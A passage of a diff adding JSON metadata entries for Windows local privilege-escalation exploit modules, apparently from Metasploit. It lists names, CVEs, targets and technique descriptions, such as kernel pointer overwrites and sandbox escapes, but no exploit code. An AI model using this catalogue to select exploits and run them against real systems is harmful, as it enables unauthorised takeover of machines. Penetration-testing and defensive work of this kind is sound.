An address\n within the HalDispatchTable is overwritten and when triggered\n with a call to NtQueryIntervalProfile will execute shellcode.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process before restoring its own token to\n avoid causing system instability.", + "references": [ + "CVE-2011-2005", + "OSVDB-76232", + "EDB-18176", + "MSB-MS11-080", + "URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP2 / SP3", + "Windows Server 2003 SP2" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb", + "is_install_path": true, + "ref_name": "windows/local/ms11_080_afdjoinleaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms13_005_hwnd_broadcast": { + "name": "MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation", + "fullname": "exploit/windows/local/ms13_005_hwnd_broadcast", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-11-27", + "type": "exploit", + "author": [ + "Tavis Ormandy", + "Axel Souchet", + "Ben Campbell " + ], + "description": "Due to a problem with isolating window broadcast messages in the Windows kernel,\n an attacker can broadcast commands from a lower Integrity Level process to a\n higher Integrity Level process, thereby effecting a privilege escalation. This\n issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and\n RT. 
Note that spawning a command prompt with the shortcut key combination Win+Shift+#\n does not work in Vista, so the attacker will have to check if the user is already\n running a command prompt and set SPAWN_PROMPT false.\n\n Three exploit techniques are available with this module. The WEB technique will\n execute a powershell encoded payload from a Web location. The FILE technique\n will drop an executable to the file system, set it to medium integrity and execute\n it. The TYPE technique will attempt to execute a powershell encoded payload directly\n from the command line, but may take some time to complete.", + "references": [ + "CVE-2013-0008", + "MSB-MS13-005", + "OSVDB-88966", + "URL-http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_005_hwnd_broadcast", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ms13_053_schlamperei": { + "name": "Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)", + "fullname": "exploit/windows/local/ms13_053_schlamperei", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-12-01", + "type": "exploit", + "author": [ + "Nils", + "Jon", + "Donato Capitella ", + "Ben Campbell " + ], + "description": "This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.\n The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).\n This allows any unprivileged process to freely migrate to winlogon.exe, achieving\n privilege escalation. 
This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.\n NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.", + "references": [ + "CVE-2013-1300", + "MSB-MS13-053", + "URL-https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP0/SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms13_053_schlamperei.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_053_schlamperei", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms13_081_track_popup_menu": { + "name": "Windows TrackPopupMenuEx Win32k NULL Page", + "fullname": "exploit/windows/local/ms13_081_track_popup_menu", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-10-08", + "type": "exploit", + "author": [ + "Seth Gibson", + "Dan Zentner", + "Matias Soler", + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in win32k.sys where under\n specific conditions TrackPopupMenuEx will pass a NULL pointer to\n the MNEndMenuState procedure. 
This module has been tested\n successfully on Windows 7 SP0 and Windows 7 SP1.", + "references": [ + "CVE-2013-3881", + "OSVDB-98212", + "BID-62830", + "MSB-MS13-081", + "URL-http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html", + "URL-http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP0/SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms13_081_track_popup_menu.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_081_track_popup_menu", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms13_097_ie_registry_symlink": { + "name": "MS13-097 Registry Symlink IE Sandbox Escape", + "fullname": "exploit/windows/local/ms13_097_ie_registry_symlink", + "aliases": [], + "rank": 500, + "disclosure_date": "2013-12-10", + "type": "exploit", + "author": [ + "James Forshaw", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in Internet Explorer Sandbox which allows to\n escape the Enhanced Protected Mode and execute code with Medium Integrity. 
The\n vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll\n component, which can be abused to force medium integrity IE to user influenced keys.\n By using registry symlinks it's possible force IE to add a policy entry in the registry\n and finally bypass Enhanced Protected Mode.", + "references": [ + "CVE-2013-5045", + "MSB-MS13-097", + "BID-64115", + "URL-https://github.com/tyranid/IE11SandboxEscapes" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 - 11" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_097_ie_registry_symlink", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms14_009_ie_dfsvc": { + "name": "MS14-009 .NET Deployment Service IE Sandbox Escape", + "fullname": "exploit/windows/local/ms14_009_ie_dfsvc", + "aliases": [], + "rank": 500, + "disclosure_date": "2014-02-11", + "type": "exploit", + "author": [ + "James Forshaw", + "juan vazquez " + ], + "description": "This module abuses a process creation policy in Internet Explorer's sandbox, specifically\n in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the\n Enhanced Protected Mode, and execute code with Medium Integrity.", + "references": [ + "CVE-2014-0257", + "MSB-MS14-009", + "BID-65417", + "URL-https://github.com/tyranid/IE11SandboxEscapes" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 - 11" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb", + "is_install_path": true, + "ref_name": 
"windows/local/ms14_009_ie_dfsvc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms14_058_track_popup_menu": { + "name": "Windows TrackPopupMenu Win32k NULL Pointer Dereference", + "fullname": "exploit/windows/local/ms14_058_track_popup_menu", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-10-14", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez ", + "Spencer McIntyre", + "OJ Reeves " + ], + "description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.", + "references": [ + "CVE-2014-4113", + "OSVDB-113167", + "BID-70364", + "MSB-MS14-058", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms14_058_track_popup_menu.rb", + "is_install_path": true, + "ref_name": "windows/local/ms14_058_track_popup_menu", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms14_070_tcpip_ioctl": { + "name": "MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference", + "fullname": 
"exploit/windows/local/ms14_070_tcpip_ioctl", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-11-11", + "type": "exploit", + "author": [ + "Matt Bergin ", + "Jay Smith " + ], + "description": "A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys\n can allow a local attacker to trigger a NULL pointer dereference by using a\n specially crafted IOCTL. This flaw can be abused to elevate privileges to\n SYSTEM.", + "references": [ + "CVE-2014-4076", + "MSB-MS14-070", + "OSVDB-114532", + "URL-https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Server 2003 SP2" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb", + "is_install_path": true, + "ref_name": "windows/local/ms14_070_tcpip_ioctl", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms15_004_tswbproxy": { + "name": "MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape", + "fullname": "exploit/windows/local/ms15_004_tswbproxy", + "aliases": [], + "rank": 400, + "disclosure_date": "2015-01-13", + "type": "exploit", + "author": [ + "Unknown", + "Henry Li", + "juan vazquez " + ], + "description": "This module abuses a process creation policy in Internet Explorer's\n sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime\n proxy, TSWbPrxy.exe. This vulnerability allows the attacker to escape the\n Protected Mode and execute code with Medium Integrity. At the moment, this\n module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). 
This\n module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE\n 11.", + "references": [ + "CVE-2015-0016", + "MSB-MS15-004", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Protected Mode (Windows 7) / 32 bits" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms15_004_tswbproxy.rb", + "is_install_path": true, + "ref_name": "windows/local/ms15_004_tswbproxy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms15_051_client_copy_image": { + "name": "Windows ClientCopyImage Win32k Exploit", + "fullname": "exploit/windows/local/ms15_051_client_copy_image", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-05-12", + "type": "exploit", + "author": [ + "Unknown", + "hfirefox", + "OJ Reeves", + "Spencer McIntyre" + ], + "description": "This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.", + "references": [ + "CVE-2015-1701", + "MSB-MS15-051", + "URL-https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html", + "URL-https://github.com/hfiref0x/CVE-2015-1701", + "URL-https://technet.microsoft.com/library/security/MS15-051" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms15_051_client_copy_image.rb", + "is_install_path": true, + "ref_name": 
"windows/local/ms15_051_client_copy_image", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms15_078_atmfd_bof": { + "name": "MS15-078 Microsoft Windows Font Driver Buffer Overflow", + "fullname": "exploit/windows/local/ms15_078_atmfd_bof", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-07-11", + "type": "exploit", + "author": [ + "Eugene Ching", + "Mateusz Jurczyk", + "Cedric Halbronn", + "juan vazquez " + ], + "description": "This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing\n a malformed font. The vulnerability was exploited by the hacking team and disclosed in\n the July data leak. This module has been tested successfully on vulnerable builds of\n Windows 8.1 x64.", + "references": [ + "CVE-2015-2426", + "CVE-2015-2433", + "MSB-MS15-078", + "MSB-MS15-080", + "URL-https://github.com/vlad902/hacking-team-windows-kernel-lpe", + "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/", + "URL-https://code.google.com/p/google-security-research/issues/detail?id=369", + "URL-https://code.google.com/p/google-security-research/issues/detail?id=480" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 8.1 x64" + ], + "mod_time": "2023-10-12 17:33:58 +0000", + "path": "/modules/exploits/windows/local/ms15_078_atmfd_bof.rb", + "is_install_path": true, + "ref_name": "windows/local/ms15_078_atmfd_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_014_wmi_recv_notif": { + "name": "Windows 
WMI Receive Notification Exploit", + "fullname": "exploit/windows/local/ms16_014_wmi_recv_notif", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-04", + "type": "exploit", + "author": [ + "smmrootkit", + "de7ec7ed", + "de7ec7ed" + ], + "description": "This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.\n This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.", + "references": [ + "CVE-2016-0040", + "MSB-MS16-014", + "URL-https://github.com/de7ec7ed/CVE-2016-0040", + "URL-https://github.com/Rootkitsmm/cve-2016-0040", + "URL-https://technet.microsoft.com/en-us/library/security/ms16-014.aspx" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP0/SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_014_wmi_recv_notif", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_016_webdav": { + "name": "MS16-016 mrxdav.sys WebDav Local Privilege Escalation", + "fullname": "exploit/windows/local/ms16_016_webdav", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-02-09", + "type": "exploit", + "author": [ + "Tamas Koczka", + "William Webb " + ], + "description": "This module exploits the vulnerability in mrxdav.sys described by MS16-016. 
The module will spawn\n a process on the target system and elevate its privileges to NT AUTHORITY\\SYSTEM before executing\n the specified payload within the context of the elevated process.", + "references": [ + "CVE-2016-0051", + "MSB-MS16-016" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1" + ], + "mod_time": "2021-07-21 12:35:47 +0000", + "path": "/modules/exploits/windows/local/ms16_016_webdav.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_016_webdav", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_032_secondary_logon_handle_privesc": { + "name": "MS16-032 Secondary Logon Handle Privilege Escalation", + "fullname": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-03-21", + "type": "exploit", + "author": [ + "James Forshaw", + "b33f", + "khr0x40sh" + ], + "description": "This module exploits the lack of sanitization of standard handles in Windows' Secondary\n Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12\n 32 and 64 bit. 
This module will only work against those versions of Windows with\n Powershell 2.0 or later and systems with two or more CPU cores.", + "references": [ + "MSB-MS16-032", + "CVE-2016-0099", + "URL-https://twitter.com/FuzzySec/status/723254004042612736", + "URL-https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_075_reflection": { + "name": "Windows Net-NTLMv2 Reflection DCOM/RPC", + "fullname": "exploit/windows/local/ms16_075_reflection", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-01-16", + "type": "exploit", + "author": [ + "FoxGloveSec", + "breenmachine", + "Mumbai" + ], + "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. 
Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.", + "references": [ + "MSB-MS16-075", + "CVE-2016-3225", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", + "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "URL-https://github.com/breenmachine/RottenPotatoNG" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows x86", + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms16_075_reflection.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_075_reflection", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_075_reflection_juicy": { + "name": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)", + "fullname": "exploit/windows/local/ms16_075_reflection_juicy", + "aliases": [], + "rank": 500, + "disclosure_date": "2016-01-16", + "type": "exploit", + "author": [ + "FoxGloveSec", + "breenmachine", + "decoder", + "ohpe", + "phra", + "lupman" + ], + "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.\n Windows 10 after version 1803, (April 2018 update, build 17134) and all\n versions of Windows Server 2019 are not vulnerable.", + "references": [ + "MSB-MS16-075", + "CVE-2016-3225", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", + 
"URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "URL-https://github.com/breenmachine/RottenPotatoNG", + "URL-https://decoder.cloud/2017/12/23/the-lonely-potato/", + "URL-https://ohpe.it/juicy-potato/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_075_reflection_juicy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms18_8120_win32k_privesc": { + "name": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", + "fullname": "exploit/windows/local/ms18_8120_win32k_privesc", + "aliases": [], + "rank": 400, + "disclosure_date": "2018-05-09", + "type": "exploit", + "author": [ + "unamer", + "bigric3", + "Anton Cherepanov", + "Dhiraj Mishra " + ], + "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.", + "references": [ + "BID-104034", + "CVE-2018-8120", + "URL-https://github.com/unamer/CVE-2018-8120", + "URL-https://github.com/bigric3/cve-2018-8120", + "URL-http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 7 x64", + "Windows 7 x86" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/ms18_8120_win32k_privesc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ms_ndproxy": { + "name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation", + "fullname": "exploit/windows/local/ms_ndproxy", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-11-27", + "type": "exploit", + "author": [ + "Unknown", + "ryujin", + "Shahin Ramezany", + "juan vazquez " + ], + "description": "This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003\n SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while\n processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used\n to access an array unsafely, and the value is used to perform a call, leading to a NULL\n pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. 
This\n module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to\n work the service \"Routing and Remote Access\" must be running on the target system.", + "references": [ + "CVE-2013-5065", + "MSB-MS14-002", + "OSVDB-100368", + "BID-63971", + "EDB-30014", + "URL-http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/", + "URL-http://technet.microsoft.com/en-us/security/advisory/2914486", + "URL-http://www.secniu.com/blog/?p=53", + "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html", + "URL-http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3", + "Windows Server 2003 SP2" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms_ndproxy.rb", + "is_install_path": true, + "ref_name": "windows/local/ms_ndproxy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/novell_client_nicm": { + "name": "Novell Client 2 SP3 nicm.sys Local Privilege Escalation", + "fullname": "exploit/windows/local/novell_client_nicm", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-05-22", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a flaw in the nicm.sys driver to execute arbitrary code in\n kernel space. The vulnerability occurs while handling ioctl requests with code\n 0x143B6B, where a user provided pointer is used as function pointer. 
The module\n has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.", + "references": [ + "CVE-2013-3956", + "OSVDB-93718", + "URL-http://www.novell.com/support/kb/doc.php?id=7012497", + "URL-http://pastebin.com/GB4iiEwR" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 7 SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/novell_client_nicm.rb", + "is_install_path": true, + "ref_name": "windows/local/novell_client_nicm", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/novell_client_nwfs": { + "name": "Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation", + "fullname": "exploit/windows/local/novell_client_nwfs", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-06-26", + "type": "exploit", + "author": [ + "Ruben Santamarta", + "juan vazquez " + ], + "description": "This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel\n space. The corruption occurs while handling ioctl requests with code 0x1438BB,\n where a 0x00000009 dword is written to an arbitrary address. An entry within the\n HalDispatchTable is overwritten in order to execute arbitrary code when\n NtQueryIntervalProfile is called. 
The module has been tested successfully on\n Windows XP SP3 with Novell Client 4.91 SP4.", + "references": [ + "CVE-2008-3158", + "OSVDB-46578", + "BID-30001" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/novell_client_nwfs.rb", + "is_install_path": true, + "ref_name": "windows/local/novell_client_nwfs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/nscp_pe": { + "name": "NSClient++ 0.5.2.35 - Privilege escalation", + "fullname": "exploit/windows/local/nscp_pe", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-20", + "type": "exploit", + "author": [ + "kindredsec", + "BZYO", + "Yann Castel (yann.castel " + ], + "description": "This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.\n For this module to work, both the NSClient++ web interface and `ExternalScripts` features must be enabled.\n You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.", + "references": [ + "EDB-48360", + "EDB-46802" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/local/nscp_pe.rb", + "is_install_path": true, + "ref_name": "windows/local/nscp_pe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + 
"ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ntapphelpcachecontrol": { + "name": "MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check", + "fullname": "exploit/windows/local/ntapphelpcachecontrol", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-09-30", + "type": "exploit", + "author": [ + "James Forshaw", + "sinn3r " + ], + "description": "On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)\n allows application compatibility data to be cached for quick reuse when new processes are\n created. A normal user can query the cache but cannot add new cached entries as the\n operation is restricted to administrators. This is checked in the function\n AhcVerifyAdminContext.\n\n This function has a vulnerability where it doesn't correctly check the impersonation token\n of the caller to determine if the user is an administrator. It reads the caller's\n impersonation token using PsReferenceImpersonationToken and then does a comparison between\n the user SID in the token to LocalSystem's SID. 
